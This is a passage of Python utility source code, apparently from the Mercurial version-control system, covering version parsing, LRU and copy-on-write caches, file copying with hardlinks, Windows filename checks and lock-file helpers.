1003 1003 >>> v = b'3.6.1+190-df9b73d2d444'
1004 1004 >>> versiontuple(v, 2)
1005 1005 (3, 6)
1006 1006 >>> versiontuple(v, 3)
1007 1007 (3, 6, 1)
1008 1008 >>> versiontuple(v, 4)
1009 1009 (3, 6, 1, '190-df9b73d2d444')
1010 1010
1011 1011 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1012 1012 (3, 6, 1, '190-df9b73d2d444+20151118')
1013 1013
1014 1014 >>> v = b'3.6'
1015 1015 >>> versiontuple(v, 2)
1016 1016 (3, 6)
1017 1017 >>> versiontuple(v, 3)
1018 1018 (3, 6, None)
1019 1019 >>> versiontuple(v, 4)
1020 1020 (3, 6, None, None)
1021 1021
1022 1022 >>> v = b'3.9-rc'
1023 1023 >>> versiontuple(v, 2)
1024 1024 (3, 9)
1025 1025 >>> versiontuple(v, 3)
1026 1026 (3, 9, None)
1027 1027 >>> versiontuple(v, 4)
1028 1028 (3, 9, None, 'rc')
1029 1029
1030 1030 >>> v = b'3.9-rc+2-02a8fea4289b'
1031 1031 >>> versiontuple(v, 2)
1032 1032 (3, 9)
1033 1033 >>> versiontuple(v, 3)
1034 1034 (3, 9, None)
1035 1035 >>> versiontuple(v, 4)
1036 1036 (3, 9, None, 'rc+2-02a8fea4289b')
1037 1037 """
1038 1038 if not v:
1039 1039 v = version()
1040 1040 parts = remod.split('[\+-]', v, 1)
1041 1041 if len(parts) == 1:
1042 1042 vparts, extra = parts[0], None
1043 1043 else:
1044 1044 vparts, extra = parts
1045 1045
1046 1046 vints = []
1047 1047 for i in vparts.split('.'):
1048 1048 try:
1049 1049 vints.append(int(i))
1050 1050 except ValueError:
1051 1051 break
1052 1052 # (3, 6) -> (3, 6, None)
1053 1053 while len(vints) < 3:
1054 1054 vints.append(None)
1055 1055
1056 1056 if n == 2:
1057 1057 return (vints[0], vints[1])
1058 1058 if n == 3:
1059 1059 return (vints[0], vints[1], vints[2])
1060 1060 if n == 4:
1061 1061 return (vints[0], vints[1], vints[2], extra)
1062 1062
1063 1063 def cachefunc(func):
1064 1064 '''cache the result of function calls'''
1065 1065 # XXX doesn't handle keywords args
1066 1066 if func.__code__.co_argcount == 0:
1067 1067 cache = []
1068 1068 def f():
1069 1069 if len(cache) == 0:
1070 1070 cache.append(func())
1071 1071 return cache[0]
1072 1072 return f
1073 1073 cache = {}
1074 1074 if func.__code__.co_argcount == 1:
1075 1075 # we gain a small amount of time because
1076 1076 # we don't need to pack/unpack the list
1077 1077 def f(arg):
1078 1078 if arg not in cache:
1079 1079 cache[arg] = func(arg)
1080 1080 return cache[arg]
1081 1081 else:
1082 1082 def f(*args):
1083 1083 if args not in cache:
1084 1084 cache[args] = func(*args)
1085 1085 return cache[args]
1086 1086
1087 1087 return f
1088 1088
1089 1089 class cow(object):
1090 1090 """helper class to make copy-on-write easier
1091 1091
1092 1092 Call preparewrite before doing any writes.
1093 1093 """
1094 1094
1095 1095 def preparewrite(self):
1096 1096 """call this before writes, return self or a copied new object"""
1097 1097 if getattr(self, '_copied', 0):
1098 1098 self._copied -= 1
1099 1099 return self.__class__(self)
1100 1100 return self
1101 1101
1102 1102 def copy(self):
1103 1103 """always do a cheap copy"""
1104 1104 self._copied = getattr(self, '_copied', 0) + 1
1105 1105 return self
1106 1106
1107 1107 class sortdict(collections.OrderedDict):
1108 1108 '''a simple sorted dictionary
1109 1109
1110 1110 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1111 1111 >>> d2 = d1.copy()
1112 1112 >>> d2
1113 1113 sortdict([('a', 0), ('b', 1)])
1114 1114 >>> d2.update([(b'a', 2)])
1115 1115 >>> list(d2.keys()) # should still be in last-set order
1116 1116 ['b', 'a']
1117 1117 '''
1118 1118
1119 1119 def __setitem__(self, key, value):
1120 1120 if key in self:
1121 1121 del self[key]
1122 1122 super(sortdict, self).__setitem__(key, value)
1123 1123
1124 1124 if pycompat.ispypy:
1125 1125 # __setitem__() isn't called as of PyPy 5.8.0
1126 1126 def update(self, src):
1127 1127 if isinstance(src, dict):
1128 1128 src = src.iteritems()
1129 1129 for k, v in src:
1130 1130 self[k] = v
1131 1131
1132 1132 class cowdict(cow, dict):
1133 1133 """copy-on-write dict
1134 1134
1135 1135 Be sure to call d = d.preparewrite() before writing to d.
1136 1136
1137 1137 >>> a = cowdict()
1138 1138 >>> a is a.preparewrite()
1139 1139 True
1140 1140 >>> b = a.copy()
1141 1141 >>> b is a
1142 1142 True
1143 1143 >>> c = b.copy()
1144 1144 >>> c is a
1145 1145 True
1146 1146 >>> a = a.preparewrite()
1147 1147 >>> b is a
1148 1148 False
1149 1149 >>> a is a.preparewrite()
1150 1150 True
1151 1151 >>> c = c.preparewrite()
1152 1152 >>> b is c
1153 1153 False
1154 1154 >>> b is b.preparewrite()
1155 1155 True
1156 1156 """
1157 1157
1158 1158 class cowsortdict(cow, sortdict):
1159 1159 """copy-on-write sortdict
1160 1160
1161 1161 Be sure to call d = d.preparewrite() before writing to d.
1162 1162 """
1163 1163
1164 1164 class transactional(object):
1165 1165 """Base class for making a transactional type into a context manager."""
1166 1166 __metaclass__ = abc.ABCMeta
1167 1167
1168 1168 @abc.abstractmethod
1169 1169 def close(self):
1170 1170 """Successfully closes the transaction."""
1171 1171
1172 1172 @abc.abstractmethod
1173 1173 def release(self):
1174 1174 """Marks the end of the transaction.
1175 1175
1176 1176 If the transaction has not been closed, it will be aborted.
1177 1177 """
1178 1178
1179 1179 def __enter__(self):
1180 1180 return self
1181 1181
1182 1182 def __exit__(self, exc_type, exc_val, exc_tb):
1183 1183 try:
1184 1184 if exc_type is None:
1185 1185 self.close()
1186 1186 finally:
1187 1187 self.release()
1188 1188
1189 1189 @contextlib.contextmanager
1190 1190 def acceptintervention(tr=None):
1191 1191 """A context manager that closes the transaction on InterventionRequired
1192 1192
1193 1193 If no transaction was provided, this simply runs the body and returns
1194 1194 """
1195 1195 if not tr:
1196 1196 yield
1197 1197 return
1198 1198 try:
1199 1199 yield
1200 1200 tr.close()
1201 1201 except error.InterventionRequired:
1202 1202 tr.close()
1203 1203 raise
1204 1204 finally:
1205 1205 tr.release()
1206 1206
1207 1207 @contextlib.contextmanager
1208 1208 def nullcontextmanager():
1209 1209 yield
1210 1210
1211 1211 class _lrucachenode(object):
1212 1212 """A node in a doubly linked list.
1213 1213
1214 1214 Holds a reference to nodes on either side as well as a key-value
1215 1215 pair for the dictionary entry.
1216 1216 """
1217 1217 __slots__ = (u'next', u'prev', u'key', u'value')
1218 1218
1219 1219 def __init__(self):
1220 1220 self.next = None
1221 1221 self.prev = None
1222 1222
1223 1223 self.key = _notset
1224 1224 self.value = None
1225 1225
1226 1226 def markempty(self):
1227 1227 """Mark the node as emptied."""
1228 1228 self.key = _notset
1229 1229
1230 1230 class lrucachedict(object):
1231 1231 """Dict that caches most recent accesses and sets.
1232 1232
1233 1233 The dict consists of an actual backing dict - indexed by original
1234 1234 key - and a doubly linked circular list defining the order of entries in
1235 1235 the cache.
1236 1236
1237 1237 The head node is the newest entry in the cache. If the cache is full,
1238 1238 we recycle head.prev and make it the new head. Cache accesses result in
1239 1239 the node being moved to before the existing head and being marked as the
1240 1240 new head node.
1241 1241 """
1242 1242 def __init__(self, max):
1243 1243 self._cache = {}
1244 1244
1245 1245 self._head = head = _lrucachenode()
1246 1246 head.prev = head
1247 1247 head.next = head
1248 1248 self._size = 1
1249 1249 self._capacity = max
1250 1250
1251 1251 def __len__(self):
1252 1252 return len(self._cache)
1253 1253
1254 1254 def __contains__(self, k):
1255 1255 return k in self._cache
1256 1256
1257 1257 def __iter__(self):
1258 1258 # We don't have to iterate in cache order, but why not.
1259 1259 n = self._head
1260 1260 for i in range(len(self._cache)):
1261 1261 yield n.key
1262 1262 n = n.next
1263 1263
1264 1264 def __getitem__(self, k):
1265 1265 node = self._cache[k]
1266 1266 self._movetohead(node)
1267 1267 return node.value
1268 1268
1269 1269 def __setitem__(self, k, v):
1270 1270 node = self._cache.get(k)
1271 1271 # Replace existing value and mark as newest.
1272 1272 if node is not None:
1273 1273 node.value = v
1274 1274 self._movetohead(node)
1275 1275 return
1276 1276
1277 1277 if self._size < self._capacity:
1278 1278 node = self._addcapacity()
1279 1279 else:
1280 1280 # Grab the last/oldest item.
1281 1281 node = self._head.prev
1282 1282
1283 1283 # At capacity. Kill the old entry.
1284 1284 if node.key is not _notset:
1285 1285 del self._cache[node.key]
1286 1286
1287 1287 node.key = k
1288 1288 node.value = v
1289 1289 self._cache[k] = node
1290 1290 # And mark it as newest entry. No need to adjust order since it
1291 1291 # is already self._head.prev.
1292 1292 self._head = node
1293 1293
1294 1294 def __delitem__(self, k):
1295 1295 node = self._cache.pop(k)
1296 1296 node.markempty()
1297 1297
1298 1298 # Temporarily mark as newest item before re-adjusting head to make
1299 1299 # this node the oldest item.
1300 1300 self._movetohead(node)
1301 1301 self._head = node.next
1302 1302
1303 1303 # Additional dict methods.
1304 1304
1305 1305 def get(self, k, default=None):
1306 1306 try:
1307 1307 return self._cache[k].value
1308 1308 except KeyError:
1309 1309 return default
1310 1310
1311 1311 def clear(self):
1312 1312 n = self._head
1313 1313 while n.key is not _notset:
1314 1314 n.markempty()
1315 1315 n = n.next
1316 1316
1317 1317 self._cache.clear()
1318 1318
1319 1319 def copy(self):
1320 1320 result = lrucachedict(self._capacity)
1321 1321 n = self._head.prev
1322 1322 # Iterate in oldest-to-newest order, so the copy has the right ordering
1323 1323 for i in range(len(self._cache)):
1324 1324 result[n.key] = n.value
1325 1325 n = n.prev
1326 1326 return result
1327 1327
1328 1328 def _movetohead(self, node):
1329 1329 """Mark a node as the newest, making it the new head.
1330 1330
1331 1331 When a node is accessed, it becomes the freshest entry in the LRU
1332 1332 list, which is denoted by self._head.
1333 1333
1334 1334 Visually, let's make ``N`` the new head node (* denotes head):
1335 1335
1336 1336 previous/oldest <-> head <-> next/next newest
1337 1337
1338 1338 ----<->--- A* ---<->-----
1339 1339 | |
1340 1340 E <-> D <-> N <-> C <-> B
1341 1341
1342 1342 To:
1343 1343
1344 1344 ----<->--- N* ---<->-----
1345 1345 | |
1346 1346 E <-> D <-> C <-> B <-> A
1347 1347
1348 1348 This requires the following moves:
1349 1349
1350 1350 C.next = D (node.prev.next = node.next)
1351 1351 D.prev = C (node.next.prev = node.prev)
1352 1352 E.next = N (head.prev.next = node)
1353 1353 N.prev = E (node.prev = head.prev)
1354 1354 N.next = A (node.next = head)
1355 1355 A.prev = N (head.prev = node)
1356 1356 """
1357 1357 head = self._head
1358 1358 # C.next = D
1359 1359 node.prev.next = node.next
1360 1360 # D.prev = C
1361 1361 node.next.prev = node.prev
1362 1362 # N.prev = E
1363 1363 node.prev = head.prev
1364 1364 # N.next = A
1365 1365 # It is tempting to do just "head" here, however if node is
1366 1366 # adjacent to head, this will do bad things.
1367 1367 node.next = head.prev.next
1368 1368 # E.next = N
1369 1369 node.next.prev = node
1370 1370 # A.prev = N
1371 1371 node.prev.next = node
1372 1372
1373 1373 self._head = node
1374 1374
1375 1375 def _addcapacity(self):
1376 1376 """Add a node to the circular linked list.
1377 1377
1378 1378 The new node is inserted before the head node.
1379 1379 """
1380 1380 head = self._head
1381 1381 node = _lrucachenode()
1382 1382 head.prev.next = node
1383 1383 node.prev = head.prev
1384 1384 node.next = head
1385 1385 head.prev = node
1386 1386 self._size += 1
1387 1387 return node
1388 1388
1389 1389 def lrucachefunc(func):
1390 1390 '''cache most recent results of function calls'''
1391 1391 cache = {}
1392 1392 order = collections.deque()
1393 1393 if func.__code__.co_argcount == 1:
1394 1394 def f(arg):
1395 1395 if arg not in cache:
1396 1396 if len(cache) > 20:
1397 1397 del cache[order.popleft()]
1398 1398 cache[arg] = func(arg)
1399 1399 else:
1400 1400 order.remove(arg)
1401 1401 order.append(arg)
1402 1402 return cache[arg]
1403 1403 else:
1404 1404 def f(*args):
1405 1405 if args not in cache:
1406 1406 if len(cache) > 20:
1407 1407 del cache[order.popleft()]
1408 1408 cache[args] = func(*args)
1409 1409 else:
1410 1410 order.remove(args)
1411 1411 order.append(args)
1412 1412 return cache[args]
1413 1413
1414 1414 return f
1415 1415
1416 1416 class propertycache(object):
1417 1417 def __init__(self, func):
1418 1418 self.func = func
1419 1419 self.name = func.__name__
1420 1420 def __get__(self, obj, type=None):
1421 1421 result = self.func(obj)
1422 1422 self.cachevalue(obj, result)
1423 1423 return result
1424 1424
1425 1425 def cachevalue(self, obj, value):
1426 1426 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1427 1427 obj.__dict__[self.name] = value
1428 1428
1429 1429 def clearcachedproperty(obj, prop):
1430 1430 '''clear a cached property value, if one has been set'''
1431 1431 if prop in obj.__dict__:
1432 1432 del obj.__dict__[prop]
1433 1433
1434 1434 def increasingchunks(source, min=1024, max=65536):
1435 1435 '''return no less than min bytes per chunk while data remains,
1436 1436 doubling min after each chunk until it reaches max'''
1437 1437 def log2(x):
1438 1438 if not x:
1439 1439 return 0
1440 1440 i = 0
1441 1441 while x:
1442 1442 x >>= 1
1443 1443 i += 1
1444 1444 return i - 1
1445 1445
1446 1446 buf = []
1447 1447 blen = 0
1448 1448 for chunk in source:
1449 1449 buf.append(chunk)
1450 1450 blen += len(chunk)
1451 1451 if blen >= min:
1452 1452 if min < max:
1453 1453 min = min << 1
1454 1454 nmin = 1 << log2(blen)
1455 1455 if nmin > min:
1456 1456 min = nmin
1457 1457 if min > max:
1458 1458 min = max
1459 1459 yield ''.join(buf)
1460 1460 blen = 0
1461 1461 buf = []
1462 1462 if buf:
1463 1463 yield ''.join(buf)
1464 1464
1465 1465 def always(fn):
1466 1466 return True
1467 1467
1468 1468 def never(fn):
1469 1469 return False
1470 1470
1471 1471 def nogc(func):
1472 1472 """disable garbage collector
1473 1473
1474 1474 Python's garbage collector triggers a GC each time a certain number of
1475 1475 container objects (the number being defined by gc.get_threshold()) are
1476 1476 allocated even when marked not to be tracked by the collector. Tracking has
1477 1477 no effect on when GCs are triggered, only on what objects the GC looks
1478 1478 into. As a workaround, disable GC while building complex (huge)
1479 1479 containers.
1480 1480
1481 1481 This garbage collector issue have been fixed in 2.7. But it still affect
1482 1482 CPython's performance.
1483 1483 """
1484 1484 def wrapper(*args, **kwargs):
1485 1485 gcenabled = gc.isenabled()
1486 1486 gc.disable()
1487 1487 try:
1488 1488 return func(*args, **kwargs)
1489 1489 finally:
1490 1490 if gcenabled:
1491 1491 gc.enable()
1492 1492 return wrapper
1493 1493
1494 1494 if pycompat.ispypy:
1495 1495 # PyPy runs slower with gc disabled
1496 1496 nogc = lambda x: x
1497 1497
1498 1498 def pathto(root, n1, n2):
1499 1499 '''return the relative path from one place to another.
1500 1500 root should use os.sep to separate directories
1501 1501 n1 should use os.sep to separate directories
1502 1502 n2 should use "/" to separate directories
1503 1503 returns an os.sep-separated path.
1504 1504
1505 1505 If n1 is a relative path, it's assumed it's
1506 1506 relative to root.
1507 1507 n2 should always be relative to root.
1508 1508 '''
1509 1509 if not n1:
1510 1510 return localpath(n2)
1511 1511 if os.path.isabs(n1):
1512 1512 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1513 1513 return os.path.join(root, localpath(n2))
1514 1514 n2 = '/'.join((pconvert(root), n2))
1515 1515 a, b = splitpath(n1), n2.split('/')
1516 1516 a.reverse()
1517 1517 b.reverse()
1518 1518 while a and b and a[-1] == b[-1]:
1519 1519 a.pop()
1520 1520 b.pop()
1521 1521 b.reverse()
1522 1522 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1523 1523
1524 1524 # the location of data files matching the source code
1525 1525 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1526 1526 # executable version (py2exe) doesn't support __file__
1527 1527 datapath = os.path.dirname(pycompat.sysexecutable)
1528 1528 else:
1529 1529 datapath = os.path.dirname(pycompat.fsencode(__file__))
1530 1530
1531 1531 i18n.setdatapath(datapath)
1532 1532
1533 1533 def checksignature(func):
1534 1534 '''wrap a function with code to check for calling errors'''
1535 1535 def check(*args, **kwargs):
1536 1536 try:
1537 1537 return func(*args, **kwargs)
1538 1538 except TypeError:
1539 1539 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1540 1540 raise error.SignatureError
1541 1541 raise
1542 1542
1543 1543 return check
1544 1544
1545 1545 # a whilelist of known filesystems where hardlink works reliably
1546 1546 _hardlinkfswhitelist = {
1547 1547 'btrfs',
1548 1548 'ext2',
1549 1549 'ext3',
1550 1550 'ext4',
1551 1551 'hfs',
1552 1552 'jfs',
1553 1553 'NTFS',
1554 1554 'reiserfs',
1555 1555 'tmpfs',
1556 1556 'ufs',
1557 1557 'xfs',
1558 1558 'zfs',
1559 1559 }
1560 1560
1561 1561 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1562 1562 '''copy a file, preserving mode and optionally other stat info like
1563 1563 atime/mtime
1564 1564
1565 1565 checkambig argument is used with filestat, and is useful only if
1566 1566 destination file is guarded by any lock (e.g. repo.lock or
1567 1567 repo.wlock).
1568 1568
1569 1569 copystat and checkambig should be exclusive.
1570 1570 '''
1571 1571 assert not (copystat and checkambig)
1572 1572 oldstat = None
1573 1573 if os.path.lexists(dest):
1574 1574 if checkambig:
1575 1575 oldstat = checkambig and filestat.frompath(dest)
1576 1576 unlink(dest)
1577 1577 if hardlink:
1578 1578 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1579 1579 # unless we are confident that dest is on a whitelisted filesystem.
1580 1580 try:
1581 1581 fstype = getfstype(os.path.dirname(dest))
1582 1582 except OSError:
1583 1583 fstype = None
1584 1584 if fstype not in _hardlinkfswhitelist:
1585 1585 hardlink = False
1586 1586 if hardlink:
1587 1587 try:
1588 1588 oslink(src, dest)
1589 1589 return
1590 1590 except (IOError, OSError):
1591 1591 pass # fall back to normal copy
1592 1592 if os.path.islink(src):
1593 1593 os.symlink(os.readlink(src), dest)
1594 1594 # copytime is ignored for symlinks, but in general copytime isn't needed
1595 1595 # for them anyway
1596 1596 else:
1597 1597 try:
1598 1598 shutil.copyfile(src, dest)
1599 1599 if copystat:
1600 1600 # copystat also copies mode
1601 1601 shutil.copystat(src, dest)
1602 1602 else:
1603 1603 shutil.copymode(src, dest)
1604 1604 if oldstat and oldstat.stat:
1605 1605 newstat = filestat.frompath(dest)
1606 1606 if newstat.isambig(oldstat):
1607 1607 # stat of copied file is ambiguous to original one
1608 1608 advanced = (
1609 1609 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1610 1610 os.utime(dest, (advanced, advanced))
1611 1611 except shutil.Error as inst:
1612 1612 raise error.Abort(str(inst))
1613 1613
1614 1614 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1615 1615 """Copy a directory tree using hardlinks if possible."""
1616 1616 num = 0
1617 1617
1618 1618 gettopic = lambda: hardlink and _('linking') or _('copying')
1619 1619
1620 1620 if os.path.isdir(src):
1621 1621 if hardlink is None:
1622 1622 hardlink = (os.stat(src).st_dev ==
1623 1623 os.stat(os.path.dirname(dst)).st_dev)
1624 1624 topic = gettopic()
1625 1625 os.mkdir(dst)
1626 1626 for name, kind in listdir(src):
1627 1627 srcname = os.path.join(src, name)
1628 1628 dstname = os.path.join(dst, name)
1629 1629 def nprog(t, pos):
1630 1630 if pos is not None:
1631 1631 return progress(t, pos + num)
1632 1632 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1633 1633 num += n
1634 1634 else:
1635 1635 if hardlink is None:
1636 1636 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1637 1637 os.stat(os.path.dirname(dst)).st_dev)
1638 1638 topic = gettopic()
1639 1639
1640 1640 if hardlink:
1641 1641 try:
1642 1642 oslink(src, dst)
1643 1643 except (IOError, OSError):
1644 1644 hardlink = False
1645 1645 shutil.copy(src, dst)
1646 1646 else:
1647 1647 shutil.copy(src, dst)
1648 1648 num += 1
1649 1649 progress(topic, num)
1650 1650 progress(topic, None)
1651 1651
1652 1652 return hardlink, num
1653 1653
1654 1654 _winreservednames = {
1655 1655 'con', 'prn', 'aux', 'nul',
1656 1656 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1657 1657 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1658 1658 }
1659 1659 _winreservedchars = ':*?"<>|'
1660 1660 def checkwinfilename(path):
1661 1661 r'''Check that the base-relative path is a valid filename on Windows.
1662 1662 Returns None if the path is ok, or a UI string describing the problem.
1663 1663
1664 1664 >>> checkwinfilename(b"just/a/normal/path")
1665 1665 >>> checkwinfilename(b"foo/bar/con.xml")
1666 1666 "filename contains 'con', which is reserved on Windows"
1667 1667 >>> checkwinfilename(b"foo/con.xml/bar")
1668 1668 "filename contains 'con', which is reserved on Windows"
1669 1669 >>> checkwinfilename(b"foo/bar/xml.con")
1670 1670 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1671 1671 "filename contains 'AUX', which is reserved on Windows"
1672 1672 >>> checkwinfilename(b"foo/bar/bla:.txt")
1673 1673 "filename contains ':', which is reserved on Windows"
1674 1674 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1675 1675 "filename contains '\\x07', which is invalid on Windows"
1676 1676 >>> checkwinfilename(b"foo/bar/bla ")
1677 1677 "filename ends with ' ', which is not allowed on Windows"
1678 1678 >>> checkwinfilename(b"../bar")
1679 1679 >>> checkwinfilename(b"foo\\")
1680 1680 "filename ends with '\\', which is invalid on Windows"
1681 1681 >>> checkwinfilename(b"foo\\/bar")
1682 1682 "directory name ends with '\\', which is invalid on Windows"
1683 1683 '''
1684 1684 if path.endswith('\\'):
1685 1685 return _("filename ends with '\\', which is invalid on Windows")
1686 1686 if '\\/' in path:
1687 1687 return _("directory name ends with '\\', which is invalid on Windows")
1688 1688 for n in path.replace('\\', '/').split('/'):
1689 1689 if not n:
1690 1690 continue
1691 1691 for c in _filenamebytestr(n):
1692 1692 if c in _winreservedchars:
1693 1693 return _("filename contains '%s', which is reserved "
1694 1694 "on Windows") % c
1695 1695 if ord(c) <= 31:
1696 1696 return _("filename contains '%s', which is invalid "
1697 1697 "on Windows") % stringutil.escapestr(c)
1698 1698 base = n.split('.')[0]
1699 1699 if base and base.lower() in _winreservednames:
1700 1700 return _("filename contains '%s', which is reserved "
1701 1701 "on Windows") % base
1702 1702 t = n[-1:]
1703 1703 if t in '. ' and n not in '..':
1704 1704 return _("filename ends with '%s', which is not allowed "
1705 1705 "on Windows") % t
1706 1706
1707 1707 if pycompat.iswindows:
1708 1708 checkosfilename = checkwinfilename
1709 1709 timer = time.clock
1710 1710 else:
1711 1711 checkosfilename = platform.checkosfilename
1712 1712 timer = time.time
1713 1713
1714 1714 if safehasattr(time, "perf_counter"):
1715 1715 timer = time.perf_counter
1716 1716
1717 1717 def makelock(info, pathname):
1718 1718 """Create a lock file atomically if possible
1719 1719
1720 1720 This may leave a stale lock file if symlink isn't supported and signal
1721 1721 interrupt is enabled.
1722 1722 """
1723 1723 try:
1724 1724 return os.symlink(info, pathname)
1725 1725 except OSError as why:
1726 1726 if why.errno == errno.EEXIST:
1727 1727 raise
1728 1728 except AttributeError: # no symlink in os
1729 1729 pass
1730 1730
1731 1731 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1732 1732 ld = os.open(pathname, flags)
1733 1733 os.write(ld, info)
1734 1734 os.close(ld)
1735 1735
1736 1736 def readlock(pathname):
1737 1737 try:
1738 1738 return os.readlink(pathname)
1739 1739 except OSError as why:
1740 1740 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1741 1741 raise
1742 1742 except AttributeError: # no symlink in os
1743 1743 pass
1744 1744 fp = posixfile(pathname, 'rb')
1745 1745 r = fp.read()
1746 1746 fp.close()
1747 1747 return r
1748 1748
1749 1749 def fstat(fp):
1750 1750 '''stat file object that may not have fileno method.'''
1751 1751 try:
1752 1752 return os.fstat(fp.fileno())
1753 1753 except AttributeError:
1754 1754 return os.stat(fp.name)
1755 1755
1756 1756 # File system features
1757 1757
1758 1758 def fscasesensitive(path):
1759 1759 """
1760 1760 Return true if the given path is on a case-sensitive filesystem
1761 1761
1762 1762 Requires a path (like /foo/.hg) ending with a foldable final
1763 1763 directory component.
1764 1764 """
1765 1765 s1 = os.lstat(path)
1766 1766 d, b = os.path.split(path)
1767 1767 b2 = b.upper()
1768 1768 if b == b2:
1769 1769 b2 = b.lower()
1770 1770 if b == b2:
1771 1771 return True # no evidence against case sensitivity
1772 1772 p2 = os.path.join(d, b2)
1773 1773 try:
1774 1774 s2 = os.lstat(p2)
1775 1775 if s2 == s1:
1776 1776 return False
1777 1777 return True
1778 1778 except OSError:
1779 1779 return True
1780 1780
1781 1781 try:
1782 1782 import re2
1783 1783 _re2 = None
1784 1784 except ImportError:
1785 1785 _re2 = False
1786 1786
1787 1787 class _re(object):
1788 1788 def _checkre2(self):
1789 1789 global _re2
1790 1790 try:
1791 1791 # check if match works, see issue3964
1792 1792 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1793 1793 except ImportError:
1794 1794 _re2 = False
1795 1795
1796 1796 def compile(self, pat, flags=0):
1797 1797 '''Compile a regular expression, using re2 if possible
1798 1798
1799 1799 For best performance, use only re2-compatible regexp features. The
1800 1800 only flags from the re module that are re2-compatible are
1801 1801 IGNORECASE and MULTILINE.'''
1802 1802 if _re2 is None:
1803 1803 self._checkre2()
1804 1804 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1805 1805 if flags & remod.IGNORECASE:
1806 1806 pat = '(?i)' + pat
1807 1807 if flags & remod.MULTILINE:
1808 1808 pat = '(?m)' + pat
1809 1809 try:
1810 1810 return re2.compile(pat)
1811 1811 except re2.error:
1812 1812 pass
1813 1813 return remod.compile(pat, flags)
1814 1814
1815 1815 @propertycache
1816 1816 def escape(self):
1817 1817 '''Return the version of escape corresponding to self.compile.
1818 1818
1819 1819 This is imperfect because whether re2 or re is used for a particular
1820 1820 function depends on the flags, etc, but it's the best we can do.
1821 1821 '''
1822 1822 global _re2
1823 1823 if _re2 is None:
1824 1824 self._checkre2()
1825 1825 if _re2:
1826 1826 return re2.escape
1827 1827 else:
1828 1828 return remod.escape
1829 1829
1830 1830 re = _re()
1831 1831
1832 1832 _fspathcache = {}
1833 1833 def fspath(name, root):
1834 1834 '''Get name in the case stored in the filesystem
1835 1835
1836 1836 The name should be relative to root, and be normcase-ed for efficiency.
1837 1837
1838 1838 Note that this function is unnecessary, and should not be
1839 1839 called, for case-sensitive filesystems (simply because it's expensive).
1840 1840
1841 1841 The root should be normcase-ed, too.
1842 1842 '''
1843 1843 def _makefspathcacheentry(dir):
1844 1844 return dict((normcase(n), n) for n in os.listdir(dir))
1845 1845
1846 1846 seps = pycompat.ossep
1847 1847 if pycompat.osaltsep:
1848 1848 seps = seps + pycompat.osaltsep
1849 1849 # Protect backslashes. This gets silly very quickly.
1850 1850 seps.replace('\\','\\\\')
1851 1851 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1852 1852 dir = os.path.normpath(root)
1853 1853 result = []
1854 1854 for part, sep in pattern.findall(name):
1855 1855 if sep:
1856 1856 result.append(sep)
1857 1857 continue
1858 1858
1859 1859 if dir not in _fspathcache:
1860 1860 _fspathcache[dir] = _makefspathcacheentry(dir)
1861 1861 contents = _fspathcache[dir]
1862 1862
1863 1863 found = contents.get(part)
1864 1864 if not found:
1865 1865 # retry "once per directory" per "dirstate.walk" which
1866 1866 # may take place for each patches of "hg qpush", for example
1867 1867 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1868 1868 found = contents.get(part)
1869 1869
1870 1870 result.append(found or part)
1871 1871 dir = os.path.join(dir, part)
1872 1872
1873 1873 return ''.join(result)
1874 1874
1875 1875 def checknlink(testfile):
1876 1876 '''check whether hardlink count reporting works properly'''
1877 1877
1878 1878 # testfile may be open, so we need a separate file for checking to
1879 1879 # work around issue2543 (or testfile may get lost on Samba shares)
1880 1880 f1, f2, fp = None, None, None
1881 1881 try:
1882 1882 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1883 1883 suffix='1~', dir=os.path.dirname(testfile))
1884 1884 os.close(fd)
1885 1885 f2 = '%s2~' % f1[:-2]
1886 1886
1887 1887 oslink(f1, f2)
1888 1888 # nlinks() may behave differently for files on Windows shares if
1889 1889 # the file is open.
1890 1890 fp = posixfile(f2)
1891 1891 return nlinks(f2) > 1
1892 1892 except OSError:
1893 1893 return False
1894 1894 finally:
1895 1895 if fp is not None:
1896 1896 fp.close()
1897 1897 for f in (f1, f2):
1898 1898 try:
1899 1899 if f is not None:
1900 1900 os.unlink(f)
1901 1901 except OSError:
1902 1902 pass
1903 1903
1904 1904 def endswithsep(path):
1905 1905 '''Check path ends with os.sep or os.altsep.'''
1906 1906 return (path.endswith(pycompat.ossep)
1907 1907 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1908 1908
1909 1909 def splitpath(path):
1910 1910 '''Split path by os.sep.
1911 1911 Note that this function does not use os.altsep because this is
1912 1912 an alternative of simple "xxx.split(os.sep)".
1913 1913 It is recommended to use os.path.normpath() before using this
1914 1914 function if need.'''
1915 1915 return path.split(pycompat.ossep)
1916 1916
1917 1917 def mktempcopy(name, emptyok=False, createmode=None):
1918 1918 """Create a temporary file with the same contents from name
1919 1919
1920 1920 The permission bits are copied from the original file.
1921 1921
1922 1922 If the temporary file is going to be truncated immediately, you
1923 1923 can use emptyok=True as an optimization.
1924 1924
1925 1925 Returns the name of the temporary file.
1926 1926 """
1927 1927 d, fn = os.path.split(name)
